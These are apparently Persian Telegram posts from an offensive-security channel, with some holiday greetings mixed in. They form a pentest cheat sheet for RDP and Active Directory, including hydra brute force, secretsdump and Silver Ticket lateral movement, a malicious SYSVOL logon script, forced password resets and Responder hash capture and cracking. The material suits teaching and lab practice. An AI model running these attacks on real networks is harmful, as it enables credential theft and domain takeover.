آماده‌ سازی برای NTLM Relay از راه دور: Lateral Movement بدون NTLM و پورت 445/TCP

این مقاله یک سناریو واقعی از تست نفوذ را نشان می‌دهد که در آن مهاجم پس از دستیابی به دسترسی اولیه به یک سرور،با غیرفعال کردن عمدی سرویس‌ های حیاتی NetLogon، LanManServer و LanManWorkstation، مسیر معمول NTLM Relay از طریق پورت 445 را مسدود می‌ کند.

مراحل دقیق حمله:

1. غیرفعال کردن سرویس‌های حیاتی:

sc stop netlogon
sc stop lanmanserver
sc config lanmanserver start= disabled
sc stop lanmanworkstation
sc config lanmanworkstation start= disabled

2. تأیید بسته بودن پورت 445:

 nmap -p 445 -sT -Pn <serverIP>

3. راه حل جایگزین - استفاده از Kerberos:

■ استخراج هش‌های NTLM از LSA Secrets با secretsdump.py
■ به دست آوردن Domain SID با lookupsid.py
■ ساخت Silver Ticket با ticketer.py

4. دسترسی به سیستم تارگت:
■ استفاده از atexec-pro.py برای اجرای دستور از راه دور
■ آپلود و اجرای پیلود (msf_win_x64.exe)

⚠️ سلب مسئولیت:
این محتوا صرفاً برای اهداف آموزشی و در محیط ‌های لابراتور مجاز ارائه می ‌شود.
@KavehOffSec

🔖 آماده‌ سازی برای NTLM Relay از راه دور: Lateral Movement بدون NTLM و پورت 445/TCP
@KavehOffSec

CVE-2025-59287 (CVSS 9.8)

آسیب‌پذیری بحرانی RCE در WSUS

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59287

@KavehOffSec

RDP بکدور
RDP Shadowing
فعال‌سازی Shadowing RDP
شمارش کاربران فعال
استفاده از shadow mode
سناریوی حمله کامل


@KavehOffSec

منم كوروش، شاه جهان، شاه بزرگ، شاه نيرومند، شاه بابِل، شاه سومر و اَكد، شاه چهار گوشه جهان.

هفتم آبان، روز بزرگداشت کوروش بزرگ است؛ پادشاهی که نه فقط برای ایرانیان، بلکه برای تمام جهان نماد انسانیت، داد و آزادی است.

یادآوری و پاسداشت چنین روزی، یادآوری ریشه‌های تاریخی و فرهنگی ماست؛ یادآوری میراثی که بر پایه خرد، عدالت و احترام به انسان بنا شده است.

امروز اگرچه جامعه ما با چالش‌ها و مشکلات فراوان روبه‌روست، اما نباید بگذاریم این دشواری‌ها، ما را از یادآوری و پاسداشت تاریخ و هویت ایرانی‌مان دور کند.

هفتم آبان بزرگداشت کوروش بزرگ بر تمام ایرانیان همایون باد

🔖 پروتکل ریموت دسکتاپ - تست نفوذ RDP

پروتکل ریموت دکستاپ RDP پروتکلی است که به کاربر یک رابط گرافیکی ارائه می‌ دهد تا از طریق اتصال شبکه به کامپیوتر دیگری متصل شود. پورت پیش‌ فرض آن ۳۳۸۹ است.

Enumeration

nmap --script rdp-enum-encryption -p 3389 <target-ip>
nmap --script rdp-ntlm-info -p 3389 <target-ip>
nmap --script rdp* -p 3389 <target-ip>

Brute Force Credentials

hydra -l username -P passwords.txt <target-ip> rdp
hydra -L usernames.txt -p password <target-ip> rdp

Connect
Remmina

Remmina :
یک کلاینت ریپوت دکستاپ برای سیستم‌ عامل‌ های کامپیوتری مبتنی بر POSIX است..


remmina :

# -c: Connect given URI or file
remmina -c rdp://[email protected]
remmina -c rdp://domain\\[email protected]
remmina -c rdp://username:[email protected]

# ---------------------------------------------------------------------------------

# Settings

# Keyboard mapping
1. On Remmina client window, click menu icon and move to "Preferences".
2. Navigate to "RDP" tab and check "Use client keyboard mapping".
3. Reboot Remmina

FreeRDP

xfreerdp /u:username /v:10.0.0.1:3389
xfreerdp /u:username /p:password /cert:ignore /v:10.0.0.1 /workarea
# Create a shared drive (/drive:LOCAL_DIR,SHARE_NAME)
xfreerdp /u:username /p:password /drive:.,share /v:10.0.0.1
# Useful command for exploiting
xfreerdp /v:10.0.0.1 /u:username /p:password +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share

# --------------------------------------------------------------------------------

# On remote Windows

# Access share directory in Command Prompt or PowerShell
\\tsclient\\~share\

Rdesktop

rdesktop -u username -p password 10.0.0.1:3389

#RDP
@KavehOffSec

کاربرد کامندهای شبکه لینوکس در عملیات Red Teaming(از کتاب Red Team Guide) هر کامند زیر رو با تمرکز بر کاربرد عملی در فازهای استاندارد MITRE ATT&CK توضیح دادم. این توضیحات کمک میکنن بفهمید هر ابزار چطور توی عملیات واقعی تست نفوذ کمک میکنه.


کامندها بر اساس کتاب

توضیحات: تحلیل شخصی + تجربهٔ عملیاتی

مطالعه در توییتر

تست نفوذ Active Directory - بخش اول

اکتیودایرکتوری (AD) یک سرویس دایرکتوری است که توسط مایکروسافت برای شبکه‌های دامینی ویندوز توسعه داده شده است.

شناسایی (Enumeration)
کشف Domain Controllerها

dig @<target-ip> example.local ANY
gobuster dns -d example.local -w subdomains.txt -t 25

شمارش یا enum با BloodHound
1. اجرای BloodHound
ما از BloodHound Community Edition استفاده می‌کنیم.

دستور زیر Docker Compose مربوط به BloodHound را اجرا می‌کند:

curl -L https://ghst.ly/getbhce > docker-compose.yml
sudo docker-compose down -v # اگر می‌خواهید پسورد BloodHound را ریست کنید
sudo docker-compose pull && sudo docker-compose up

بعد از اجرا، رابط وب از طریق مرورگر و آدرس زیر در دسترس است:

https://localhost:8080

با نام کاربری admin و پسوردی که هنگام اجرای دستور در لاگ نمایش داده میشود لاگین کنید.

برای مشخص کردن IP و پورت دلخواه، متغیرهای محیطی زیر را روی ماشین اتک تنظیم کنید:

export BLOODHOUND_HOST=10.0.0.1
export BLOODHOUND_PORT=8090

ادامه دارد ...
#AD
@KavehOffSec

🔥 در مناسبت شب چله، یا همانطور که در دوره ساسانی به آن گفته میشد «زایش مِهر»، به یاد ایزد مِهر، که خود پیمان مقدس است، که تابش خورشیدی است که انسان را به فرّ و خورشید، به وسپار اورمزد، و تمامی مردمان خوب را به هم متصل میکند، باشد که خجسته باشی، چله خجسته باد!

🔥 جشن شب چله، شب گردهمایی خانوادگی و دور هم بودن و شادمانی خویشاوندان و شاهنامه خوانی و فال حافظ گرفتن، فرخنده باد

تست نفوذ Active Directory - بخش دوم

جمع‌آوری داده‌ها
گزینه ۱: استفاده از NetExec
اگر از قبل NetExec روی سیستم شما نصب است، به نظر من این ساده‌ترین راه است.

netexec ldap <target-ip> -d example.local -u username -p password --dns-server <target-ip> --bloodhound -c All

گزینه ۲: استفاده از BloodHound.py

همچنین می‌توانیم از BloodHound.py استفاده کنیم.
آن را به شکل زیر نصب کنید:

python3 -m venv .venv
source .venv/bin/activate
pipx install bloodhound   # یا به‌جای 'pipx' از 'pip3' استفاده کنید
bloodhound-python -h

سپس داده‌ها را جمع‌آوری کنید:

# -d: دامنه (Domain)
# -u: نام کاربری (Username)
# -p: رمز عبور (Password)
# -dc: دامین کنترلر (Domain Controller)
# -c all: جمع‌آوری تمام داده‌ها
# -ns: تعیین nameserver جایگزین
bloodhound-python -d example.local -u username -p password -dc dc.example.local -c all -ns ns.example.local

#اگر نتوانستیم دامنه را resolve کنیم، می‌توانیم از dnschef برای ساخت یک DNS جعلی به‌صورت پراکسی استفاده کنیم:
sudo python3 dnschef.py --fakeip <target-ip> --nameserver <target-ip>

#AD
@KavehOffSec

تست نفوذ Active Directory - بخش سوم

آپلود داده‌های جمع‌آوری‌شده

پس از اجرا، فایل‌های نتیجه با پسوند (*.json) در دایرکتوری فعلی تولید می‌شوند. تمام این فایل‌های JSON را در BloodHound داخل مرورگر وب آپلود کنید.

می‌توانیم روابط موجود در Active Directory را بررسی کنیم.

بررسی Investigation

# فهرست تمام کاربران
net user /domain
net user <username> /domain
Get-ADUser -Filter *
Get-ADUser -Identity <username> -Server dc.example.com -Properties *
Get-ADUser -Filter 'Name -like "*michael"' -Server dc.example.com | Format-Table Name,SamAccountName -A

# فهرست تمام گروه‌ها
net group /domain
net group "<group>" /domain
PS> Get-ADGroup -Identity <group> -Server dc.example.com -Properties *
PS> Get-ADGroupMember -Identity <group> -Server dc.example.com

# نمایش سیاست رمز عبور
net accounts /domain

# لیست Object  Active Directory
$ChangeDate = New-Object DateTime(2022, 02, 28, 12, 00, 00)
Get-ADObject -Filter 'whenChanged -gt $ChangeDate' -includeDeletedObjects -Server dc.example.com

# دریافت اطلاعات مربوط به دامنه مشخص‌شده
Get-ADDomain -Server dc.example.com

# تغییر رمز عبور کاربر Active Directory
Set-ADAccountPassword -Identity <username> -Server dc.example.com  -OldPassword (ConvertTo-SecureString -AsPlaintext "oldpass" -force) -NewPassword (ConvertTo-SecureString -AsPlaintext "newpass" -force)

# SYSVOL - یک پوشه اشتراکی که Group Policy Objects (GPOs) را ذخیره می‌کند.
dir \\dc.example.com\SYSVOL\

سوءاستفاده از اسکریپت لاگین برای کاربران دیگر

اگر کاربر فعلی مجوز نوشتن اسکریپت‌ها در SYSVOL را داشته باشد، ممکن است بتوانیم مسیر اسکریپت لاگین سایر کاربران را تغییر دهیم.

# 1. Check the permission
icacls C:\Windows\SYSVOL\sysvol\example.local\scripts\

# 2. Modify/Add a malicious script
'powershell -e <BASE64_COMMAND>' | OutFile -FilePath C:\Windows\SYSVOL\sysvol\example.local\scripts\evil.bat

# 3. Set logon script for the specified user
Set-ADUser -Identity VictimUser -ScriptPath '\\example.local\SYSVOL\example.local\scripts\evil.bat

وقتی کاربر دیگر وارد سیستم شود (Log on)، فایل .bat اجرا خواهد شد.

Force Change Password Attack
اگر به نام کاربری/رمز عبور یک حساب دسترسی پیدا کنیم و نام کاربری حساب‌های دیگر را هم بدانیم، ممکن است بتوانیم رمز عبور کاربران دیگر را تغییر دهیم. برای انجام این کار، کاربر باید مجوز GenericAll را برای تغییر رمز عبور سایر کاربران داشته باشد.

توضیح پارامترها:

-U:
اعتبارنامه کاربری که مجوز تغییر رمز عبور کاربر دیگر را دارد
-I:
آدرس IP تارگت

-S:
نام سرور تارگت

net rpc password "TargetUserName" "myPassw0rd@123" -U "UserName"%"Password" -I "10.0.0.1" -S "EXAMPLE.LOCAL"

این دستور رمز عبور کاربر تارگت را با استفاده از دسترسی کاربری که مجوز لازم را دارد، به‌صورت اجباری تغییر می‌دهد.

Microsoft Management Console (mmc)
برای راه‌اندازی و پیکربندی Active Directory، مراحل زیر را دنبال کنید:

روی آیکون ویندوز راست‌کلیک کنید.
روی Run کلیک کرده و عبارت mmc را وارد کنید، سپس OK را بزنید.
در پنجره MMC، روی File → Add or Remove Snap-ins کلیک کنید.
هر سه Snap-in مربوط به Active Directory را اضافه کنید.
در پنل سمت چپ، روی Active Directory… راست‌کلیک کرده و گزینه Change Forest را انتخاب کنید.
نام دامنه را به‌عنوان Root domain وارد کرده و روی OK کلیک کنید.
از منوی بالا روی View → Advanced Features کلیک کنید.

#AD
@KavehOffSec

الگوی نام‌گذاری (Naming Convention) - بخش پایانی

اگر فهرستی از نام‌های کاربری را در Active Directory پیدا کنیم، می‌توانیم با استفاده از الگوی نام‌گذاری، نام‌های کاربری احتمالی را حدس بزنیم.

برای مثال:

john smith   -> jsmith, j.smith, john.smith
michael pole -> mpole, m.pole, michael.pole

ورود SSH با اعتبارنامه‌های Active Directory

ssh dc.example.com\\<ad_username>@sub.dc.example.com

تزریق اعتبارنامه‌ها به حافظه (Inject Credentials into Memory)

# /netonly: تمام ارتباطات شبکه‌ای از این اعتبارنامه‌های تزریق‌شده برای احراز هویت استفاده می‌کنند.
runas.exe /netonly /user:<domain>\<username> cmd.exe

پیکربندی DNS

PowerShell
$dnsip = "<DC_IP>"
$index = Get-NetAdapter -Name 'Ethernet' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip

اکنون بررسی کنید که تنظیمات به‌درستی اعمال شده باشند:

nslookup dc.example.com

دانش پایه
مدیریت کاربران (User Management)

تفویض اختیار (Delegation)

در Active Directory، مدیر سیستم می‌تواند بدون اعطای دسترسی‌های کامل مدیریتی، مدیریت کاربران را در یک Organizational Unit (OU) به کاربر دیگری واگذار کند.

راه‌اندازی

ابزار Active Directory Users and Computers را باز کنید.

روی OU موردنظر راست‌کلیک کرده و گزینه Delegate Control… را انتخاب کنید.

در پنجره بازشده، نام کاربری را که می‌خواهید اختیار مدیریت به او واگذار شود وارد کنید.

وظایفی را که کاربر Delegation‌شده مجاز به انجام آن‌هاست انتخاب کنید.

روی OK کلیک کنید.

مدیریت کاربران (Manage Users)

با کاربر Delegation ‌شده وارد سیستم شوید.

برای مثال، اگر بخواهید رمز عبور کاربر john را ریست کنید، دستور زیر را در PowerShell اجرا کنید و سپس رمز عبور جدید را در پنجره درخواست‌شده وارد نمایید:

Set-ADAccountPassword john -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose

اولین باری که John پس از این تغییر وارد سیستم می‌شود، می‌خواهیم مجبور شود رمز عبور دلخواه خودش را (نه رمزی که شما تعیین کرده‌اید) تنظیم کند. برای این کار دستور زیر را اجرا کنید:

Set-ADUser -ChangePasswordAtLogon $true -Identity john -Verbose

اکنون زمانی که John وارد سیستم شود، از او خواسته می‌شود رمز عبور جدیدی انتخاب کند.

رهگیری احراز هویت NetNTLM (Intercept NetNTLM Authentication)

ابزار Responder را اجرا کنید تا به درخواست‌های LLMNR، NBT-NS و WPAD گوش دهد.

sudo responder -I <interface-like-eth0>

خب Responder را در حال اجرا نگه دارید تا زمانی که درخواست‌هایی دریافت شود.
اگر هش NTLM دریافت کردید، آن را روی سیستم محلی کرک کنید.

echo -n '<copied-NTLM-hash>' > hash.txt
john --format=netntlmv2 --wordlist=wordlist.txt hash.txt

#AD
@KavehOffSec